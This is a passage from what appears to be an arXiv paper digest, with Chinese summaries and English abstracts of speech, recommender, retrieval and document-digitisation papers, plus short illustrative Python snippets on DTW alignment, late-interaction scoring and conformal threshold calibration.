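print([round(v, 2) for v in out])  # [1.0, 2.04]
```

This is why the abstract can describe the fine-tuning as "scalable and memory-efficient": the optimizer state covers only the small A and B factors, not the full weight matrices.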
[NLP-104] PHONOS: PHOnetic Neutralization for Online Streaming Applications INTERSPEECH2026
【速读】: 该论文旨在解决语音匿名化(Speaker Anonymization, SA)系统在保留非本地口音(non-native accent)时导致的匿名集合缩小问题,因为口音会泄露说话者身份信息。解决方案的关键在于提出PHONOS,一个实时流式模块,通过预生成保留源音色和节奏但替换非母语发音单元(segmentals)为母语发音的“黄金语音”样本,利用带静默感知的动态时间规整(silence-aware DTW alignment)与零样本语音转换技术进行监督训练;进而采用因果口音翻译器(causal accent translator),仅需最多40ms前瞻窗口,将非母语内容标记映射为母语等效形式,训练时结合交叉熵与连接时序分类(CTC)损失。实验表明,该方法使非母语口音置信度降低81%,听觉测试评分与之匹配,并显著降低说话人关联性,同时延迟低于241ms(单GPU)。
链接: https://arxiv.org/abs/2603.27001
作者: Waris Quamer,Mu-Ruei Tseng,Ghady Nasrallah,Ricardo Gutierrez-Osuna
机构: Texas A&M University (德州农工大学)
类目: Audio and Speech Processing (eess.AS); Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: The paper is submitted to Interspeech 2026 and currently under review
Abstract:Speaker anonymization (SA) systems modify timbre while leaving regional or non-native accents intact, which is problematic because accents can narrow the anonymity set. To address this issue, we present PHONOS, a streaming module for real-time SA that neutralizes non-native accent to sound native-like. Our approach pre-generates golden speaker utterances that preserve source timbre and rhythm but replace foreign segmentals with native ones using silence-aware DTW alignment and zero-shot voice conversion. These utterances supervise a causal accent translator that maps non-native content tokens to native equivalents with at most 40ms look-ahead, trained using joint cross-entropy and CTC losses. Our evaluations show an 81% reduction in non-native accent confidence, with listening-test ratings consistent with this shift, and reduced speaker linkability as accent-neutralized utterances move away from the original speaker in embedding space while having latency under 241 ms on a single GPU.
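The alignment step rests on dynamic time warping (DTW), which pairs frames of two utterances spoken at different rates. The sketch below is plain DTW over 1-D frame features with invented sequences; the paper's version is additionally silence-aware.

```python
# Plain DTW cost between two frame-feature sequences; a time-stretched
# copy of a contour aligns at zero cost, an unrelated one does not.
def dtw(a, b, dist=lambda x, y: abs(x - y)):
    INF = float("inf")
    n, m = len(a), len(b)
    D = [[INF] * (m + 1) for _ in range(n + 1)]
    D[0][0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            D[i][j] = dist(a[i - 1], b[j - 1]) + min(
                D[i - 1][j], D[i][j - 1], D[i - 1][j - 1])
    return D[n][m]

src     = [0.0, 1.0, 2.0, 1.0, 0.0]
stretch = [0.0, 0.0, 1.0, 2.0, 2.0, 1.0, 0.0]  # same contour, slower
other   = [5.0, 5.0, 5.0, 5.0, 5.0]
print(dtw(src, stretch), dtw(src, other) > dtw(src, stretch))  # 0.0 True
```

In the paper's pipeline this alignment is what lets the golden-speaker utterance supervise the source utterance frame by frame despite differing durations.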
信息检索
[IR-0] CirrusBench: Evaluating LLM-based Agents Beyond Correctness in Real-World Cloud Service Environments KDD2026
【速读】:该论文旨在解决当前大型语言模型(Large Language Models, LLMs)在真实客户技术支持场景中评估不足的问题,尤其是现有基准测试多依赖合成环境,难以反映真实用户输入的多样性与不可预测性,且普遍忽视了服务响应效率这一关键指标。解决方案的关键在于提出CirrusBench评估框架,其核心创新在于基于真实云服务工单数据构建评测体系,保留技术客服场景中的多轮逻辑链和工具依赖关系,并引入以客户为中心的新指标(如归一化效率指数和多轮延迟),从而更全面地衡量LLM代理在准确性与效率上的综合表现,揭示当前先进模型在复杂多轮任务中效率短板,为实际技术应用提供更具指导意义的评估标准。
链接: https://arxiv.org/abs/2603.28569
作者: Yi Yu,Guangquan Hu,Chenghuang Shen,Xingyan Liu,Jing Gu,Hangyi Sun,Junzhuo Ma,Weiting Liu,Jianfeng Liu,Mingyue Pu,Yu Wang,Zhengdong Xiao,Rui Xie,Longjiu Luo,Qianrong Wang,Gurong Cui,Honglin Qiao,Wenlian Lu
机构: Fudan University (复旦大学); Alibaba Group (阿里巴巴集团)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Performance (cs.PF)
备注: Submitted for SIGKDD 2026
Abstract:The increasing agentic capabilities of Large Language Models (LLMs) have enabled their deployment in real-world applications, such as cloud services, where customer-assistant interactions exhibit high technical complexity and long-horizon dependencies, making robustness and resolution efficiency critical for customer satisfaction. However, existing benchmarks for LLM-based agents largely rely on synthetic environments that fail to capture the diversity and unpredictability of authentic customer inputs, often ignoring the resolution efficiency essential for real-world deployment. To bridge this gap, we introduce CirrusBench, a novel evaluation framework distinguished by its foundation in real-world data from authentic cloud service tickets. CirrusBench preserves the intricate multi-turn logical chains and realistic tool dependencies inherent to technical service environments. Moving beyond execution correctness, we introduce novel Customer-Centric metrics to define agent success, quantifying service quality through metrics such as the Normalized Efficiency Index and Multi-Turn Latency to explicitly measure resolution efficiency. Experiments utilizing our framework reveal that while state-of-the-art models demonstrate strong reasoning capabilities, they frequently struggle in complex, realistic multi-turn tasks and fail to meet the high-efficiency standards required for customer service, highlighting critical directions for the future development of LLM-based agents in practical technical service applications. CirrusBench evaluation framework is released at: this https URL
[IR-1] Hydra: Unifying Document Retrieval and Generation in a Single Vision-Language Model
【速读】:该论文旨在解决视觉文档理解中检索与生成模型分离所导致的内存占用翻倍和系统复杂度增加的问题。其核心解决方案是提出 Hydra,一种基于单个视觉语言模型(VLM)的双头架构,通过一个仅用于检索训练的 LoRA 适配器在推理时切换模式:启用该适配器可生成多向量嵌入以支持 ColBERT 风格的晚期交互式检索;禁用则恢复基础模型的生成能力,实现字节级完全一致的输出(在 10,500 个贪婪和随机采样样本中达 100% 一致性),且在四个 VQA 基准测试上最大 delta-ANLS 差异仅为 0.0044(共 15,301 个样本)。关键创新在于识别并实现三个工程要求(注意力模式恢复、lm_head 保留、KV 缓存感知解码),确保即使权重正确恢复,生成质量也不受影响,从而实现单一模型同时支持高效检索与高质量生成。
链接: https://arxiv.org/abs/2603.28554
作者: Athos Georgiou
机构: Independent Researcher; NCA-IT (NCA-IT公司)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: 17 pages, 2 figures, 7 tables. Model cards: this https URL ; this https URL ; this https URL ; this https URL . Evaluation scripts: this https URL
Abstract:Visual document understanding typically requires separate retrieval and generation models, doubling memory and system complexity. We present Hydra, a dual-head approach that provides both ColBERT-style late-interaction retrieval and autoregressive generation from a single vision-language model (VLM). A single LoRA adapter, trained only for retrieval, is toggled at inference: enabling it produces multi-vector embeddings; disabling it recovers the base model’s generation quality – byte-identical outputs in 100% of 10,500 greedy and stochastic samples, with max delta-ANLS = 0.0044 across 15,301 samples on four VQA benchmarks (three informative; ChartQA is near-zero for both models under greedy decoding) when compared against an independent base-model pipeline. We identify three engineering requirements (attention-mode restoration, lm_head preservation, KV-cache-aware decoding) whose omission silently breaks generation despite correct weight recovery. On ViDoRe V1, Hydra (4B) is within 1 percentage point of a controlled single-head baseline in a single training run, with higher aggregate scores on V2 and V3 that are concentrated on a subset of tasks; multi-seed experiments are needed to confirm these trends. The single-model design reduces peak GPU memory by 41%, though adapter switching introduces throughput overhead under concurrent serving loads. An ablation shows that GritLM-style joint training provides no benefit within the LoRA-based (r=16) training regime. A proof-of-concept extension to Qwen2.5-Omni-3B demonstrates that the mechanism generalizes to audio retrieval and video embedding, with speech generation.
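The ColBERT-style late interaction the retrieval head supports scores a document by taking, for each query token embedding, its maximum similarity over all document token embeddings, and summing those maxima (MaxSim). The toy 2-D vectors below are illustrative, not Hydra's multi-vector embeddings.

```python
# MaxSim late-interaction scoring: sum over query tokens of the best
# dot-product match among document tokens.
def maxsim_score(query_vecs, doc_vecs):
    def dot(u, v):
        return sum(a * b for a, b in zip(u, v))
    return sum(max(dot(q, d) for d in doc_vecs) for q in query_vecs)

query     = [[1.0, 0.0], [0.0, 1.0]]
doc_match = [[1.0, 0.0], [0.0, 1.0], [0.7, 0.7]]   # covers both query tokens
doc_other = [[-1.0, 0.0], [0.0, -1.0]]             # anti-aligned
print(maxsim_score(query, doc_match) > maxsim_score(query, doc_other))  # True
```

Because each query token matches its own best document token, late interaction preserves token-level evidence that a single pooled vector would average away, which is why the adapter emits multi-vector embeddings when enabled.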
[IR-2] With a Little Help From My Friends: Collective Manipulation in Risk-Controlling Recommender Systems
【速读】:该论文旨在解决风险控制型推荐系统(risk-controlling recommender systems)在面对协同式恶意用户行为时的脆弱性问题。这类系统依赖于用户的二元反馈(如“不感兴趣”)通过置信区间风险控制(conformal risk control)机制来保证个体对不良内容的暴露可控,但其对聚合反馈信号的依赖使其易受小规模协调群体的操纵。研究表明,仅占用户总数1%的协同攻击者即可导致非攻击用户的整体推荐质量下降高达20%。论文提出的关键解决方案是将安全保证从群体层面迁移至用户个体层面,从而在降低协同攻击影响的同时,仍能保障每个用户的个性化安全需求。
链接: https://arxiv.org/abs/2603.28476
作者: Giovanni De Toni,Cristian Consonni,Erasmo Purificato,Emilia Gomez,Bruno Lepri
机构: Fondazione Bruno Kessler (布鲁诺·凯斯勒基金会); European Commission, Joint Research Centre (JRC) (欧盟委员会联合研究中心)
类目: Information Retrieval (cs.IR); Machine Learning (cs.LG); Social and Information Networks (cs.SI)
备注:
Abstract:Recommendation systems have become central gatekeepers of online information, shaping user behaviour across a wide range of activities. In response, users increasingly organize and coordinate to steer algorithmic outcomes toward diverse goals, such as promoting relevant content or limiting harmful material, relying on platform affordances – such as likes, reviews, or ratings. While these mechanisms can serve beneficial purposes, they can also be leveraged for adversarial manipulation, particularly in systems where such feedback directly informs safety guarantees. In this paper, we study this vulnerability in recently proposed risk-controlling recommender systems, which use binary user feedback (e.g., “Not Interested”) to provably limit exposure to unwanted content via conformal risk control. We empirically demonstrate that their reliance on aggregate feedback signals makes them inherently susceptible to coordinated adversarial user behaviour. Using data from a large-scale online video-sharing platform, we show that a small coordinated group (comprising only 1% of the user population) can induce up to a 20% degradation in nDCG for non-adversarial users by exploiting the affordances provided by risk-controlling recommender systems. We evaluate simple, realistic attack strategies that require little to no knowledge of the underlying recommendation algorithm and find that, while coordinated users can significantly harm overall recommendation quality, they cannot selectively suppress specific content groups through reporting alone. Finally, we propose a mitigation strategy that shifts guarantees from the group level to the user level, showing empirically how it can reduce the impact of adversarial coordinated behaviour while ensuring personalized safety for individuals.
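Conformal risk control, the mechanism these systems rely on, calibrates a score threshold from binary feedback so that the empirical rate of unwanted exposures stays below a target risk. The sketch below is a simplified rendering with invented calibration pairs and target risk; it also makes the attack surface visible, since the chosen threshold moves with the aggregate flag counts.

```python
# Simplified conformal-risk-control calibration: pick the most permissive
# threshold whose conservative empirical risk stays below alpha.
def calibrate_threshold(cal, alpha, grid):
    """cal: (score, flagged) pairs, flagged=1 meaning the item was
    reported 'Not Interested'. Lower thresholds recommend more items."""
    n = len(cal)
    for lam in sorted(grid):
        flags_shown = sum(f for s, f in cal if s >= lam)
        risk = (flags_shown + 1) / (n + 1)   # +1: worst-case next user
        if risk <= alpha:
            return lam
    return max(grid)

cal = [(0.9, 0), (0.8, 0), (0.7, 1), (0.6, 0), (0.5, 1)]
print(calibrate_threshold(cal, alpha=0.4, grid=[0.5, 0.6, 0.7, 0.8]))  # 0.6
```

A coordinated group that inflates the flagged counts drives `risk` up, forcing a higher threshold and suppressing recommendations for everyone, which is exactly the aggregate-feedback vulnerability the paper demonstrates and its user-level mitigation targets.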
[IR-3] RCLRec: Reverse Curriculum Learning for Modeling Sparse Conversions in Generative Recommendation
【速读】:该论文旨在解决大规模推荐系统中转化目标(conversion)数据稀疏导致的优化困难问题。现有生成式推荐(Generative Recommendation, GR)方法虽通过将多类型行为统一为 token 序列缓解稀疏性,但仍缺乏对转化信号的有效建模,且依赖标准注意力机制处理完整历史,未提供针对转化的额外监督。其解决方案的关键在于提出基于逆向课程学习(Reverse Curriculum Learning, RCL)的 GR 框架 RCLRec:对于每个转化目标,RCLRec 从用户历史中逆序选取与转化相关的子序列作为“课程”,将其语义 token 作为解码器前缀,与目标转化 token 共同构成联合生成目标。该设计引入了实例特定的中间监督信号,显著缓解转化稀疏性,并聚焦模型于用户的决策关键路径;同时引入课程质量感知损失以确保所选课程对转化预测具有信息价值。
链接: https://arxiv.org/abs/2603.28124
作者: Yulei Huang,Hao Deng,Haibo Xing,Jinxin Hu,Chuanfei Xu,Zulong Chen,Yu Zhang,Xiaoyi Zeng
机构: Alibaba International Digital Commerce Group(阿里巴巴国际数字商业集团); Alibaba Group(阿里巴巴集团); AI, Guangdong Laboratory of Artificial Intelligence and Digital Economy(人工智能,广东省人工智能与数字经济实验室)
类目: Information Retrieval (cs.IR)
备注:
Abstract:Conversion objectives in large-scale recommender systems are sparse, making them difficult to optimize. Generative recommendation (GR) partially alleviates data sparsity by organizing multi-type behaviors into a unified token sequence with shared representations, but conversion signals remain insufficiently modeled. While recent behavior-aware GR models encode behavior types and employ behavior-aware attention to highlight decision-related intermediate behaviors, they still rely on standard attention over the full history and provide no additional supervision for conversions, leaving conversion sparsity largely unresolved. To address these challenges, we propose RCLRec, a reverse curriculum learning-based GR framework for sparse conversion supervision. For each conversion target, RCLRec constructs a short curriculum by selecting a subsequence of conversion-related items from the history in reverse. Their semantic tokens are fed to the decoder as a prefix, together with the target conversion tokens, under a joint generation objective. This design provides additional instance-specific intermediate supervision, alleviating conversion sparsity and focusing the model on the user’s critical decision process. We further introduce a curriculum quality-aware loss to ensure that the selected curricula are informative for conversion prediction. Experiments on offline datasets and an online A/B test show that RCLRec achieves superior performance, with +2.09% advertising revenue and +1.86% orders in online deployment.
[IR-4] Quid est VERITAS? A Modular Framework for Archival Document Analysis
【速读】:该论文旨在解决历史文献数字化过程中仅限于字符级转录(character-level transcription)导致的结构与语义信息缺失问题,从而限制了计算分析的有效性。其解决方案的关键在于提出一个模块化、模型无关的框架VERITAS(Vision-Enhanced Reading, Interpretation, and Transcription of Archival Sources),将数字化重构为包含转录、版面分析和语义增强的集成工作流,采用基于模式驱动的架构,允许研究者以声明式方式指定提取目标,并通过四阶段处理流程(预处理、提取、精炼与增强)显著提升准确性与效率。实证表明,该方法在伯纳迪诺·科里奥《米兰史》的测试中相较商用OCR基线降低67.6%词错误率,并减少三倍端到端处理时间(含人工校正)。
链接: https://arxiv.org/abs/2603.28108
作者: Leonardo Bassanini,Ludovico Biancardi,Alfio Ferrara,Andrea Gamberini,Sergio Picascia,Folco Vaglienti
机构: 未知
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: to be published in: LLMs4SSH: Shaping Multilingual, Multimodal AI for the Social Sciences and Humanities, organized within the 15th Language Resource and Evaluation Conference (2026)
Abstract:The digitisation of historical documents has traditionally been conceived as a process limited to character-level transcription, producing flat text that lacks the structural and semantic information necessary for substantive computational analysis. We present VERITAS (Vision-Enhanced Reading, Interpretation, and Transcription of Archival Sources), a modular, model-agnostic framework that reconceptualises digitisation as an integrated workflow encompassing transcription, layout analysis, and semantic enrichment. The pipeline is organised into four stages - Preprocessing, Extraction, Refinement, and Enrichment - and employs a schema-driven architecture that allows researchers to declaratively specify their extraction objectives. We evaluate VERITAS on the critical edition of Bernardino Corio’s Storia di Milano, a Renaissance chronicle of over 1,600 pages. Results demonstrate that the pipeline achieves a 67.6% relative reduction in word error rate compared to a commercial OCR baseline, with a threefold reduction in end-to-end processing time when accounting for manual correction. We further illustrate the downstream utility of the pipeline’s output by querying the transcribed corpus through a retrieval-augmented generation system, demonstrating its capacity to support historical inquiry.
[IR-5] Transcription and Recognition of Italian Parliamentary Speeches Using Vision-Language Models ACL
【速读】:该论文旨在解决历史扫描文档中意大利议会演讲的自动转录、语义分割与实体链接问题,现有基于传统光学字符识别(Optical Character Recognition, OCR)的方法存在转录错误多、语义标注有限等缺陷。解决方案的关键在于构建一个融合视觉-语言模型(Vision-Language Model)的端到端处理流程:首先使用专用OCR模型提取文本并保持阅读顺序,随后借助大规模视觉-语言模型联合推理视觉布局与文本内容,实现转录优化、元素分类及发言人识别;最后通过SPARQL查询和多策略模糊匹配将识别出的发言人链接至众议院知识库。实证表明,该方法在转录质量和发言人标注上均显著优于现有基准。
链接: https://arxiv.org/abs/2603.28103
作者: Luigi Curini,Alfio Ferrara,Giovanni Pagano,Sergio Picascia
机构: 未知
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: to be published in: ParlaCLARIN V: Interoperability, Multilinguality, and Multimodality in Parliamentary Corpora, organized within the 15th Language Resource and Evaluation Conference (2026)
Abstract:Parliamentary proceedings represent a rich yet challenging resource for computational analysis, particularly when preserved only as scanned historical documents. Existing efforts to transcribe Italian parliamentary speeches have relied on traditional Optical Character Recognition pipelines, resulting in transcription errors and limited semantic annotation. In this paper, we propose a pipeline based on Vision-Language Models for the automatic transcription, semantic segmentation, and entity linking of Italian parliamentary speeches. The pipeline employs a specialised OCR model to extract text while preserving reading order, followed by a large-scale Vision-Language Model that performs transcription refinement, element classification, and speaker identification by jointly reasoning over visual layout and textual content. Extracted speakers are then linked to the Chamber of Deputies knowledge base through SPARQL queries and a multi-strategy fuzzy matching procedure. Evaluation against an established benchmark demonstrates substantial improvements both in transcription quality and speaker tagging.
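The fuzzy-matching stage can be approximated with stdlib tooling; the names, threshold, and normalization below are illustrative, and a production pipeline (like the paper's multi-strategy one, which also queries SPARQL) would additionally handle "surname, forename" reordering and honorifics.

```python
# Illustrative fuzzy speaker linking: normalize accents/case, then pick
# the knowledge-base entry with the highest SequenceMatcher ratio.
import difflib
import unicodedata

def normalize(name):
    name = unicodedata.normalize("NFKD", name)
    name = "".join(c for c in name if not unicodedata.combining(c))
    return " ".join(name.lower().split())

def link_speaker(ocr_name, kb_names, threshold=0.8):
    """Return the best-matching KB entry, or None below the threshold."""
    target = normalize(ocr_name)
    best, best_score = None, 0.0
    for kb in kb_names:
        score = difflib.SequenceMatcher(None, target, normalize(kb)).ratio()
        if score > best_score:
            best, best_score = kb, score
    return best if best_score >= threshold else None

kb = ["Alcide De Gasperi", "Palmiro Togliatti", "Giuseppe Saragat"]
print(link_speaker("Alcide De Gasperl", kb))  # tolerates OCR 'i'->'l' noise
```

The threshold trades recall for precision: too low and unrelated deputies get linked, too high and common OCR substitutions go unresolved.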
[IR-6] On the Accuracy Limits of Sequential Recommender Systems: An Entropy-Based Approach
【速读】:该论文旨在解决顺序推荐系统(Sequential Recommender Systems)中缺乏可靠、模型无关的准确率上限估计问题,从而在模型开发前实现对任务难度的客观评估与性能提升空间的量化。现有方法多依赖熵估计结合Fano不等式反演,但在推荐场景下易受候选集规模影响,并在低可预测性区域因Fano缩放导致偏差。论文提出一种基于熵诱导的、无需训练的准确率上限估算方法,其关键创新在于通过理论推导构建一个与候选集大小无关的估计器,能够在可控合成数据和多种真实世界基准上更忠实反映任务难度,且与当前最优模型的离线准确率具有高秩相关性(Spearman rho 最高达 0.914),同时支持用户群体诊断与数据选择优化,为推荐系统的数据驱动决策提供实用参考。
链接: https://arxiv.org/abs/2603.27952
作者: En Xu,Jingtao Ding,Yong Li
机构: Tsinghua University (清华大学)
类目: Information Retrieval (cs.IR)
备注:
Abstract:Sequential recommender systems have achieved steady gains in offline accuracy, yet it remains unclear how close current models are to the intrinsic accuracy limit imposed by the data. A reliable, model-agnostic estimate of this ceiling would enable principled difficulty assessment and headroom estimation before costly model development. Existing predictability analyses typically combine entropy estimation with Fano’s inequality inversion; however, in recommendation they are hindered by sensitivity to candidate-space specification and distortion from Fano-based scaling in low-predictability regimes. We develop an entropy-induced, training-free approach for quantifying accuracy limits in sequential recommendation, yielding a candidate-size-agnostic estimate. Experiments on controlled synthetic generators and diverse real-world benchmarks show that the estimator tracks oracle-controlled difficulty more faithfully than baselines, remains insensitive to candidate-set size, and achieves high rank consistency with best-achieved offline accuracy across state-of-the-art sequential recommenders (Spearman rho up to 0.914). It also supports user-group diagnostics by stratifying users by novelty preference, long-tail exposure, and activity, revealing systematic predictability differences. Furthermore, predictability can guide training data selection: training sets constructed from high-predictability users yield strong downstream performance under reduced data budgets. Overall, the proposed estimator provides a practical reference for assessing attainable accuracy limits, supporting user-group diagnostics, and informing data-centric decisions in sequential recommendation.
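The Fano-inversion baseline the abstract criticizes can be made concrete: given an entropy estimate S (in bits) and candidate-set size N, solve H_b(p) + (1 - p) * log2(N - 1) = S for the maximum achievable accuracy p. The bisection sketch below (with illustrative values) also exhibits the candidate-size sensitivity the paper objects to, since the same S yields different "limits" for different N; the paper's own estimator is designed to avoid this dependence.

```python
# Classical Fano inversion by bisection; the left-hand side is monotone
# decreasing in p on [1/N, 1), so the root is unique.
import math

def fano_max_accuracy(S, N, tol=1e-10):
    def gap(p):  # H_b(p) + (1-p) log2(N-1) - S
        h_b = 0.0 if p in (0.0, 1.0) else (-p * math.log2(p)
                                           - (1 - p) * math.log2(1 - p))
        return h_b + (1 - p) * math.log2(N - 1) - S
    lo, hi = 1.0 / N, 1.0 - 1e-12
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if gap(mid) > 0:
            lo = mid
        else:
            hi = mid
    return lo

# Same entropy estimate, different candidate-set sizes -> different limits.
limit_small = fano_max_accuracy(2.0, 100)
limit_large = fano_max_accuracy(2.0, 10000)
print(round(limit_small, 3), round(limit_large, 3))
```

With S = 2 bits the ceiling rises as N grows, even though the underlying uncertainty is unchanged, which is the distortion the candidate-size-agnostic estimator is meant to remove.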
[IR-7] GEAKG: Generative Executable Algorithm Knowledge Graphs
【速读】:该论文旨在解决算法设计中程序性知识(procedural knowledge)难以显式表示、复用与迁移的问题,即当前算法代码中的“know-how”往往隐含在实现细节中,无法跨任务或领域有效传承。其解决方案的核心是提出生成式可执行算法知识图谱(Generative Executable Algorithm Knowledge Graphs, GEAKG),关键在于:1)将节点定义为可执行的操作符(executable operators),边编码学习到的组合模式(composition patterns),通过遍历生成解;2)具备生成性(由大语言模型合成拓扑与操作符)、可执行性(每个节点均为可运行代码)和可迁移性(零样本跨域泛化);3)采用统一的三层架构与基于蚁群优化(Ant Colony Optimization, ACO)的学习引擎,仅需替换插件式本体(pluggable ontology, RoleSchema)即可适配不同领域,实验证明其在神经架构搜索和组合优化任务中均能实现零样本知识迁移。
链接: https://arxiv.org/abs/2603.27922
作者: Camilo Chacón Sartori,José H. García,Andrei Voicu Tomut,Christian Blum
机构: Catalan Institute of Nanoscience and Nanotechnology (ICN2), CSIC and BIST, Campus UAB, Bellaterra, Barcelona, Spain
类目: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注:
Abstract:In the context of algorithms for problem solving, procedural knowledge – the know-how of algorithm design and operator composition – remains implicit in code, lost between runs, and must be re-engineered for each new domain. Knowledge graphs (KGs) have proven effective for organizing declarative knowledge, yet current KG paradigms provide limited support for representing procedural knowledge as executable, learnable graph structures. We introduce Generative Executable Algorithm Knowledge Graphs (GEAKG), a class of KGs whose nodes store executable operators, whose edges encode learned composition patterns, and whose traversal generates solutions. A GEAKG is generative (topology and operators are synthesized by a Large Language Model), executable (every node is runnable code), and transferable (learned patterns generalize zero-shot across domains). The framework is domain-agnostic at the engine level: the same three-layer architecture and Ant Colony Optimization (ACO)-based learning engine can be instantiated across domains, parameterized by a pluggable ontology (RoleSchema). Two case studies – sharing no domain-specific framework code – provide concrete evidence for this framework hypothesis: (1) Neural Architecture Search across 70 cross-dataset transfer pairs on two tabular benchmarks, and (2) Combinatorial Optimization, where knowledge learned on the Traveling Salesman Problem transfers zero-shot to scheduling and assignment domains. Taken together, the results support that algorithmic expertise can be explicitly represented, learned, and transferred as executable knowledge graphs.
[IR-8] Advancing Multi-Instrument Music Transcription: Results from the 2025 AMT Challenge NEURIPS2025
【速读】:该论文旨在解决多乐器音乐转录(Multi-instrument Music Transcription)中的准确性问题,特别是针对复杂音频中多个乐器同时发声(polyphony)和音色差异(timbre variation)的挑战。解决方案的关键在于通过2025年自动音乐转录(Automatic Music Transcription, AMT)挑战赛收集并评估来自八支团队的先进算法,其中两支队伍的表现超越了基线模型MT3,验证了在提升转录精度方面的进展;同时,研究指出未来需加强在更广泛音乐流派覆盖和乐器检测能力上的优化方向。
链接: https://arxiv.org/abs/2603.27528
作者: Ojas Chaturvedi,Kayshav Bhardwaj,Tanay Gondil,Benjamin Shiue-Hal Chou,Kristen Yeon-Ji Yun,Yung-Hsiang Lu,Yujia Yan,Sungkyun Chang
机构: Purdue University (普渡大学); University of Rochester (罗切斯特大学); Queen Mary University of London (伦敦玛丽女王大学)
类目: Sound (cs.SD); Information Retrieval (cs.IR)
备注: 7 pages, 3 figures. Accepted to the AI for Music Workshop at NeurIPS 2025
Abstract:This paper presents the results of the 2025 Automatic Music Transcription (AMT) Challenge, an online competition to benchmark progress in multi-instrument transcription. Eight teams submitted valid solutions; two outperformed the baseline MT3 model. The results highlight both advances in transcription accuracy and the remaining difficulties in handling polyphony and timbre variation. We conclude with directions for future challenges: broader genre coverage and stronger emphasis on instrument detection.
[IR-9] The Price of Meaning: Why Every Semantic Memory System Forgets
【速读】:该论文旨在解决生成式 AI (Generative AI) 中记忆系统因语义组织结构导致的固有缺陷问题,即语义一致性带来的干扰、遗忘和错误回忆现象。其核心贡献在于形式化了语义连续核阈值记忆(semantically continuous kernel-threshold memories)中“语义泛化能力”与“干扰不可避免性”之间的权衡关系,并通过理论推导揭示:在有限局部内在维度下,语义表示具有有限有效秩,检索邻域中必然存在正的竞争者质量,导致随记忆增长保留率趋近于零,从而形成幂律遗忘曲线;同时证明对于满足δ-凸性的联想诱饵,仅靠阈值调节无法消除错误回忆。解决方案的关键在于识别出所有测试架构——包括向量检索、图记忆、注意力上下文、BM25文件系统检索及参数化记忆——均无法避免这一根本代价,说明语义组织的“价格”即是干扰,任何试图规避干扰的机制都会牺牲语义泛化能力。
链接: https://arxiv.org/abs/2603.27116
作者: Sambartha Ray Barman,Andrey Starenky,Sofia Bodnar,Nikhil Narasimhan,Ashwin Gopinath
机构: Sentra; Massachusetts Institute of Technology (麻省理工学院)
类目: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Neural and Evolutionary Computing (cs.NE)
备注:
Abstract:Every major AI memory system in production today organises information by meaning. That organisation enables generalisation, analogy, and conceptual retrieval – but it comes at a price. We prove that the same geometric structure enabling semantic generalisation makes interference, forgetting, and false recall inescapable. We formalise this tradeoff for semantically continuous kernel-threshold memories: systems whose retrieval score is a monotone function of an inner product in a semantic feature space with finite local intrinsic dimension. Within this class we derive four results: (1) semantically useful representations have finite effective rank; (2) finite local dimension implies positive competitor mass in retrieval neighbourhoods; (3) under growing memory, retention decays to zero, yielding power-law forgetting curves under power-law arrival statistics; (4) for associative lures satisfying a δ-convexity condition, false recall cannot be eliminated by threshold tuning. We test these predictions across five architectures: vector retrieval, graph memory, attention-based context, BM25 filesystem retrieval, and parametric memory. Pure semantic systems express the vulnerability directly as forgetting and false recall. Reasoning-augmented systems partially override these symptoms but convert graceful degradation into catastrophic failure. Systems that escape interference entirely do so by sacrificing semantic generalisation. The price of meaning is interference, and no architecture we tested avoids paying it.
[IR-10] Text Data Integration
【速读】:该论文旨在解决异构数据(特别是结构化与非结构化数据)在存储和处理过程中的整合难题,核心问题在于如何有效融合来自不同来源、格式各异的数据以实现统一访问。其解决方案的关键在于推动文本数据(unstructured data)的集成,通过识别文本中蕴含的知识并将其纳入数据集成框架,从而突破传统系统仅依赖结构化数据的局限性,提升数据工程流程的全面性和实用性。
链接: https://arxiv.org/abs/2603.27055
作者: Md Ataur Rahman,Dimitris Sacharidis,Oscar Romero,Sergi Nadal
机构: 未知
类目: Computation and Language (cs.CL); Information Retrieval (cs.IR)
备注: Accepted for Publication as a Book Chapter in “Data Engineering for Data Science” (ISBN: 978-3-032-18765-9)
Abstract:Data comes in many forms. From a shallow perspective, they can be viewed as being either in structured (e.g., as a relation, as key-value pairs) or unstructured (e.g., text, image) formats. So far, machines have been fairly good at processing and reasoning over structured data that follows a precise schema. However, the heterogeneity of data poses a significant challenge on how well diverse categories of data can be meaningfully stored and processed. Data Integration, a crucial part of the data engineering pipeline, addresses this by combining disparate data sources and providing unified data access to end-users. Until now, most data integration systems have leaned on only combining structured data sources. Nevertheless, unstructured data (a.k.a. free text) also contains a plethora of knowledge waiting to be utilized. Thus, in this chapter, we firstly make the case for the integration of textual data, to later present its challenges, state of the art and open problems.
[IR-11] Resolving the Robustness-Precision Trade-off in Financial RAG through Hybrid Document-Routed Retrieval
【速读】:该论文旨在解决金融文档问答中基于片段(chunk-based retrieval, CBR)的检索增强生成(Retrieval-Augmented Generation, RAG)系统在结构同质性高的语料库(如监管文件)中出现的跨文档片段混淆问题,该问题导致模型在关键场景下产生灾难性错误。同时,现有解决方案如语义文件路由(Semantic File Routing, SFR)虽能提升鲁棒性,但牺牲了细粒度片段检索的精度。论文提出混合文档路由检索(Hybrid Document-Routed Retrieval, HDRR),其核心创新在于设计了一个两阶段架构:第一阶段使用SFR对查询进行文档级过滤,第二阶段在选定文档范围内执行CBR,从而在消除跨文档混淆的同时保留精准的片段级检索能力。实验表明,HDRR在所有评估指标上均优于CBR和SFR,实现了鲁棒性与精度的协同优化。
链接: https://arxiv.org/abs/2603.26815
作者: Zhiyuan Cheng,Longying Lai,Yue Liu
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: 18 pages, 4 figures, 9 tables. Submitted to Expert Systems with Applications
